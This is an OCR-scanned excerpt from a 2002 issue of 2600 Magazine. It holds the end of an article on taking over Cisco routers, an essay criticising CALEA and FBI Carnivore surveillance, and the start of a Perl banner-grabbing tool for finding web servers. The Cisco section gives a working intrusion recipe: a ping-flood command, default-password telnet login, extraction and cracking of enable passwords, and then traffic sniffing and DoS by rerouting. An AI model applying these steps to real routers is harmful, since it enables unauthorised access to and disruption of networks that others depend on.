allowed to the router (serial only). Either way, by
passing this first case is beyond the scope of this
article. (Hint: combine the info to be learned in
Page 22
Cisco Xouters
this article with my spoofing article in 18:3 for
your answer.) The second possible thing is you get
a password prompt. If you get this (j ust a pass
word prompt) you're most likely at a router, and
it's on to the rest of the article.
Conceptualizing The Attack
The attack boils down to this. First, you flood
the router from one host, causing it to default to a
sort of "safe mode" wherein only the barest of
routing functions are executed. Ciscos have been
made to keep on routing until they can't possibly
route anymore. This is why critical system access
goes before routing functionality goes. Now,
Cisco builds in a little safety net for admins who
this happens to by letting them still get access to
their system to shut down a router-gone-haywire.
So, if the system is overloaded, you can telnet in
and enter the default password to get complete en
able (root !) access to the router. You then will
transmit the router's password file to your machine
and crack it. Now you have full enable access and
can do whatever you please with the router.
The Attack Itself
The first thing you'll need for this attack is at
least one valid socks (or wingate) proxy or a shell
on some system - anything to make your access
come from another host. I would recommend at
least two such hosts to do this. First, you want to
initiate a DoS attack that will flood the router,
2600 Magazine
23. such as a huge password in the password field, or
an icmp flood. For the purposes of this article, we
will use a huge ping command (as root on a
linuxlBSD box):
ping -s 65535 -f -c 1000000 cisco. host. whatever.net
Get that started and wait for a bit. Then, after a
minute or so, you telnet to cisco.host.whatever.net
from a different IP address (another NIC with its
own IP address, not one behind the same NAT
router, or through a wingate). Now, you get a nice
prompt and type the default password in (usually
enable or admin... otherwise check www.mkse
cure.comJdefpwl). Now you're logged in with full
enable access. We want to keep access and not be
noticed, so we find either the encrypted or (if
lucky) the unencrypted password. This is usually
simple. Start logging your terminal session and
type in "sh conf'. When you see a line that starts
with "enable secret" or "enable password" grab
that line. If you only see three arguments to either
of these commands, the third argument is the pass
word. Still, if you get the "enable password" line,
then be happy, because even if it's encrypted, it's a
Cisco Type 7 password (whose encryption has
been broken hundreds of times). See http://hack
ersplayground.org/papers/crack-cisco-pass
words.txt for code and explanation on how to
break Type 7 passwords. If you're not so lucky,
you'll see something like "enable secret mdS
+949a8(%OxCV8". That's an mdS encrypted pass
word. You can dump it into john the ripper (after
some formatting). Let it run for a little while and
you'll get a nice password to use to get access to
the router. Congratulations, you should have full
enable access at this point. Disconnect from the
router and stop your ping flood.
What Do I Do Now?
Well, I'd be surprised if people reading this ar
ticle didn't have ideas of things they can do once
they get full enable access on a Cisco router. But,
for those of you who don't, I'll give you some
ideas. Modify the route tables to go through an
other machine which can sniff data. TunnelX is
the best project I've seen to do this. It was featured
in Phrack 56 (http://www.phrack.org
IphracklS6/)in the article "Things To Do In Cisco
Land When You're Dead" by gauis. That article
covers installation of tunnelx. If you realize that a
significant bit of traffic goes through routers,
you'll realize that you need to set up a script to
check the packets you sniff for key terms and dis
card as they come in, so you don't waste ten gigs
of disk space in two minutes. Another fun thing
about routers is that they're often connected di
rectly (through serial) to mainframes at NOC's.
These machines are super fun to play with and are
often otherwise inaccessible to the outside. Ciscos
that are the primary router for a network are al
most always trusted machines on that internal net
work. You can get to machines that are not visible
to the Internet. DoS is also really easy. Just change
the route table of the router to send all packets re
ceived to 1 27.0.0. 1 . The possibilities are endless.
Conclusion
Cisco routers are some of the most prevalent
machines on the Internet. The security of these
machines is crucial to the survival of the Internet
and corporate networks around the globe. It is of
ten unbelievably easy to get full enable access on
a Cisco router with very little work. There are
many ways to secure your system. (See Harden
ing Cisco Routers by Thomas Akin, O'Reilly
Books, ISBN 0-S96-001 66-S or http://secinf.net
linfo/fw/cisco/add.html#routing or a host of other
sites.) But Cisco has a lot of problems that they
need to fix before your router will be secure out of
the box. Hopefully this article has moved that
along a bit.
Hi again
A New Era of
by The Prophet
As the satellite republics of the Soviet Union
fell at the end of the 20th century, the Western
world was shocked at the surveillance societies
erected by their authoritarian governments.
From a population of 17 million in East Ger
many, the dreaded Stasi secret police employed
34,000 officers, including 2 1 00 agents reading
mail and 6000 operatives listening to private
Summer 2002
telephone conversations. Additionally, over
I S0,000 active informers and up to two million
part-time informers were on the payroll. Files
were maintained by the Stasi on more than one
out of three East Germans, comprising over a
billion pages of information.
While centralized domestic surveillance in
the United States has probably not yet reached
the levels seen in East Germany, the picture is
Page 23
24. very different when government databases are
linked - and especially when government data
bases are linked with commercial ones. To help
it fight the insane "war on [some] drugs," the
federal government has already connected the
databases of the Customs Service, the Drug En
forcement Agency, the IRS, the Federal Re
serve, and the State Department. These are
accessible via FinCEN and other law enforce
ment networks (and probably via classified in
telligence networks as well - but sorry, that's
classified). Additionally, the United States has
relatively few data protection laws (particularly
concerning the collection of data for commer
cial purposes), meaning the extensive use of
computer matching has led to a " virtual " na
tional data bank. With only a few computer
searches, and without obtaining a search war
rant, law enforcement can gather a comprehen
sive file on virtually any US citizen in a matter
of minutes.
Telecommunications, unlike paper and elec
tronic records, enjoyed much stronger privacy
protections - until September I I tho Americans
have the egregious wiretapping abuses of J.
Edgar Hoover's FBI to thank for this. However,
long before September I Ith, the FBI was laying
the groundwork to turn the US telecommunica
tions system into a surveillance infrastructure.
This began in 1 994 when, at the strong urging
of former FBI Director Louis Freeh, Congress
passed the Communications Assistance for Law
Enforcement Act (CALEA, pronounced "Kuh
LEE-uh" for short).
The legal reasoning behind CALEA is fairly
recent and, to fully understand it, it should be
considered in light of the failed Clipper Chip
key escrow initiatives of the early I990s. Dur
ing the consideration of key escrow legislation
(which ultimately failed) and CALEA (which
was ultimately successful), the FBI nearly con
vinced Congress that Americans have no legal
or moral right to keep any secrets from the gov
ernment. Fortunately, Congress was not fooled -
they decided that while Americans should be
subject to surveillance of all of their communi
cations, citizens could still keep secrets from
the government. How magnanimous of them !
The stated purpose of CALEA is to preserve,
despite advances in technology, the surveillance
capabilities law enforcement agencies pos
sessed in 1 994. The actual implementation of
CALEA, predictably, has been much more
broad than Congress originally contemplated.
Technically, the FCC is tasked with deter
mining the surveillance capabilities telecommu
nications carriers are required to provide.
Because surveillance is not the core compe
tency of the FCC, they have deferred to the
Page 24
FBI's expertise, and serve as a "rubber stamp"
for the technical requirements the FBI requests.
Privacy groups have widely criticized the resul
tant I I -point "punch list," with which telecom
munications carriers must comply, as a dramatic
expansion of the capabilities originally contem
plated by CALEA. For example, mobile tele
phones containing GPS locators have recently
appeared on the market. Touted as a safety fea
ture, GPS is also a surveillance feature man
dated by CALEA. If you carry such a phone, the
FBI knows exactly where you are at all times.
(Of course, J. Edgar Hoover's FBI will only use
that capability against criminals and terrorists,
right?)
Other technical requirements on the "punch
list" include the capability to intercept all
packet-switched communications, which in
cludes Internet traffic. The FBI presents this in
seemingly reasonable terms - they just want to
tap Voice Over IP (VoIP) and other packet-mode
voice communications like any other telephone
call. Of course, to those familiar with TCP/IP,
this is very frightening indeed; the only way to
intercept the "bad guy's" data is to look at
everyone's data. On the Internet, this is accom
plished with DCS lOOO (formerly Carni vore)
and other proprietary surveillance devices. The
FBI really likes to keep secrets, so they won't
reveal a complete list of the surveillance de
vices they use, won't reveal the manufacturers,
and won't release a full list of surveillance capa
bilities. In the face of intense Congressional
pressure, the FBI reluctantly allowed one "inde
pendent technical review" of the nearly obsolete
Carnivore system. However, this was conducted
on such restrictive terms that MIT, Purdue,
Dartmouth, and UCSD refused to participate on
the grounds the study was rigged. Jeffery
Schiller, when explaining MIT's refusal to
CNN, said, "In essence, the Justice Department
is looking to borrow our reputation, and we're
2600 Magazine
25. not for sale that way." Nortel OMS I00 platform. While the capabili
ties of the FB I's switch software are, like
DCS 1 000, presently unknown, the 5E 14 soft
ware revision incorporates a number of useful
surveillance features on its own. For ex-
Eventually a research team at the obscure
Illinois Institute of Technology Research Insti
tute was selected to perform the study. While
the FBI intended to keep the identities of the
" independent researchers" a secret, they
accidentally leaked the researchers'
iilijiii(i!.iiliiiiO: ample, when a surveillance target
names on an incorrectly formatted
Adobe PDF document. So much
for secrets. As it turned out,
three of the supposedly "inde
pendent" team members pos
sessed active security
clearances (including top se
cret NSA and IRS clearance -
go figure), and two others had
close ties to the White House.
With the deck so carefully stacked
in the FBI's favor, it is surprising (and
telling) the IITRI study warned Carni
vore "does not provide protections, especially
audit functions, commensurate with the level of
the risks," and was vulnerable to "physical at
tacks, software bugs or power failures. " The
ACLU offered to perform its own review of
Carnivore, but the FBI not-so-pol itely declined.
In the interim, the next release of Carnivore,
called DCS 1 000, is now in operation. As with
Carnivore, the capabilities of DCS I 000 are not
fully disclosed. Mysteriously, many Internet
Service Providers (ISPs), including Comcast
and Sprint. have implemented so-called "trans
parent proxy" servers, possessing extensive log
ging capabilities. Comcast, in a
widely-publicized incident which even drew the
ire of US Representative (and hacker foe) Ed
Markey, was caught associating the web brows
ing habits of its customers with their IP ad
dresses. While Comcast claims they no longer
collect this information, it is likely that other
ISPs have i mplemented similar technology -
and equally l ikely that Comcast could resume
logging at the FBI's request.
While telecommunications providers are
wary of providing the FBI with direct access to
their infrastructure, most do not object out of
privacy considerations. Instead, they are pri
marily concerned that the FBI's activities do not
cause disruptions in service. Telecommunica
tions carriers are particularly i ndignant at court
rulings requiring they provide the FBI with di
rect access to telephone switches, and grant
them the abi lity to install their own software
upon the switches. Lucent implemented this ca
pability on the 5ESS switch in the 5 E l 4 soft
ware revision, which nearly every 5ESS in the
country now runs. Surveillance capabilities
have also been present for some time on the
Summer 2002
makes a phone call, the switch
can silently conference in a
pre-programmed telephone
number. Because thc FBI
also keeps secrets from
telecommunications
providers, even refusing to
share basic architectural in
formation, providers are
skeptical of the FBI's assur
ances that no potential for
disruption exists. Additionally,
because most surveillance capa
bilities are provided by the FBI's own
software, telecommunications providers
cannot audit court-ordered wiretaps. (Of course,
J. Edgar Hoover's FBI is trustworthy, so checks
and balances are not necessary.)
The cost of implementing surveillance capa
bilities is also of major concern to telecommu
n ications providers. In exchange for retrofitting
the nation's telecommunications infrastructure
with a surveillance architecture of which Stalin
could only dream (at one point in the CALEA
legislative process, the FBI proposed imple
menting the capability to simultaneously inter
cept and record one out of every 1 00 telephone
conversations taking place in each central of
fice), the federal government promised $500
million to telecommunications carriers. How
ever, i mplementing all of the requirements on
the CALEA "punch card" is estimated to cost
the cash-strapped telecommunications industry
as much as $607 million. With the additional
"roving wiretap" capabilities granted to the FBI
after September II th in the obliquely named
USA Patriot Act, the cost of i mplementation is
likely to soar even higher.
Americans face a new, and potentially dan
gerous, era of surveillance. History has proven
through the nuclear arms race, the Nixon ad
ministration, and other similar craziness that
things which are possible are not necessarily a
good idea. Surveillance societies have appeared
in the not so recent past, and they were frighten
ing indeed. Stalin's Russia. Ceausescu's Roma
nia. Hoenecker's East Germany. Perhaps the
United States can avoid the mistakes made by
the surveillance societies of the 20th century.
And perhaps J. Edgar Hoover's FBI is also com
pletely honest, professional, and incorruptible -
just like Robert Hanssen.
Page 25
26. W e b S e rv e r
Discovery Tool
By Boris Loza
This project started when I decided to find all the web servers on my network. One can do this by running
nmap to identify all open HTTP/S related ports: 80, 8000, 8080, or 443. But nmap is known for crashing servers
Uust a couple of misbehaves to mention: killing syslogd on Solaris, Cisco's DOS, etc.). Therefore it is not allowed
in some organizations. Moreover, even if the ports in question are open, nmap doesn't give you the type and the
version of the web server listening to it. Nmap can also trigger the IDS and page the information security group!
Using commercial tools like ISS Network Scanner or CyberCop to find all web servers on the network is cum
bersome, time consuming, and IDS detectable.
Taking all this into consideration I decided to write my own tool for discovering all web servers on the net
work. I wanted this tool to be easy to run, not to use "crafted" TCP packets, be efficient, quick, and provide as
much information about discovered web servers as possible. We intended to run this tool periodically, like a war
dialer, and to do this even during business hours (before users shut down their workstations to go home). I wanted
to create a tool as efficient as possible with minimum network and server impact. In this article you'll see what I
eventually came up with.
The Tool
First, let's understand a little bit about how a web server and a browser communicate. The browser or client
generates request headers and sends them to the web server. The server receives the request headers, translates
them, and generates the response headers. These response headers have to include information specific for the
web server that will allow both the browser and the server to communicate. I decided to use this information to
create the tool.
In the heart of the tool is the following Perl code:
I. use HTtf'::Respon�e;
2. use LWP::UserAgent;
3. my $ua = new LWP::UserAgent;
4. $ua->agentCMozilla/S.O');
S. my $req = new HTTP::Request(GET, ''http://$ARGYlOj'');
' 6. print $headers = $ua->request($req)->headers3s�string;
#Encapsulate HTTP responses
#Dispatch WWW requests
#User agent object created
#Using Mozilla/S.O as agent's name
#Encapsulate a request using GET method
#Read response from the web server
I use Perl's libwww-perl library for WWW access (rows I and 2). This library will provide the API for writing
my own WWW clients.
First I need to create a request header (rows 3 and 4) by specifying the name of the web browser the request
comes from. Now I can send the request to the server using the GET method (row 5). Strictly speaking, I can
use any agent's name here, for example agentCFoo'). This doesn't matter, since I need just one response from the
server and I am not going to continue the session. Now I can print everything that comes from the server (row
.6). After naming this little script as ws.pl and running it against one known web server I've got the following
:output:
C:>ws.pl 1 92. I68.0.40
'Date: Thu, 04 Apr 2002 1 5:27:06 GMT
· Accept-Ranges: bytes
' Server: Microsoft-IIS/4.0
'Content-Length: S6
· Content-Location: http://l92. 1 68.0.40IDefault.htm
Content-Type: textlhtml
• ETag: "f82f8972cf9acOI :See8"
Last-Modified: Mon, 19 Feb 2001 23:55:33 GMT
Client-Date: Thu, 04 Apr 2002 I S:28:43 GMT
Client-Peer: 1 92. 1 68.0.40:80
X-Meta-Postinfo: /scripts/postinfo.asp
Page 26 2600 Magazine
27. As I expected, the web server strikes back by sending all necessary information that will be needed for the ses
sion. If no HTTP web server is listening on port 80 the output will be:
C:>ws.pl 1 0.56.53.27
Client-Date: Thu, 04Apr 2002 1 8:38:39 GMT
In this article I am not going to explain all response headers from the output. For anybody who is interested,
please refer to RFC 261 6. For the purpose of the script, I am interested only in one: Server: Microsoft-IIS/4.0.
This is a name of the web server I connected to. So I can modify line 6 of the script to display only this re
sponse header:
print $headers = $ua->request($req)->headerCServer'):
C:>ws.pl 1 92.168.0.40
1 92. 1 68.0.40 Microsoft-IIS/4.0
. After understanding the concept, I started working on something more useful. Below is a listing of the com
plete tool. This tool will discover a single web server or all web servers on a given subnet. The default port to
scan is 80, but you can specify any port you wish:
#Web Server Discovery Tool. Boris Loza, 2002
. use HTTP::Response;
• use LWP::UserAgent;
use Getopt::Std;
$usage="Use:tws.p1 [-vI [-p port] hostname
tws.pl [-p port] -C IPadress
tws.p1 fih {To print this}
Discover Web Servers.
Hostname can be specified by an IP address or a DNS name.
Options:
-v : verbose
-p : specify a port (default 80)
-C : scan class C subnet
Example: ws.pl -v 1 92. 1 68. 1 0.3
ws.pl myhost.com
{ OR }
{ OR }
{ OR }ws.pl - p 8000 myhost.com
ws.pl -C 1 92. 1 68.0 { OR }
ws.pl -p 8000 -C 1 92. 1 68.0";
'
getopts('C:hp:v') II die "$usage";
print "$usage" if $opCh;
my $port=80; #Default port to scan
if ($opCp) { $port = $opCp; }
my $host = $ARGV[OJ;
#Create Request headers
my $ua = new LWP::UserAgent;
$ua->agentCFoo');
#Send Request headers
my $req = new HTTP::Request(GET, ''http://$host:$port'');
my $response = $ua->request($req);
#Use verbose mode. For single host only!
if ($opU) {
Summer 2002 Page 27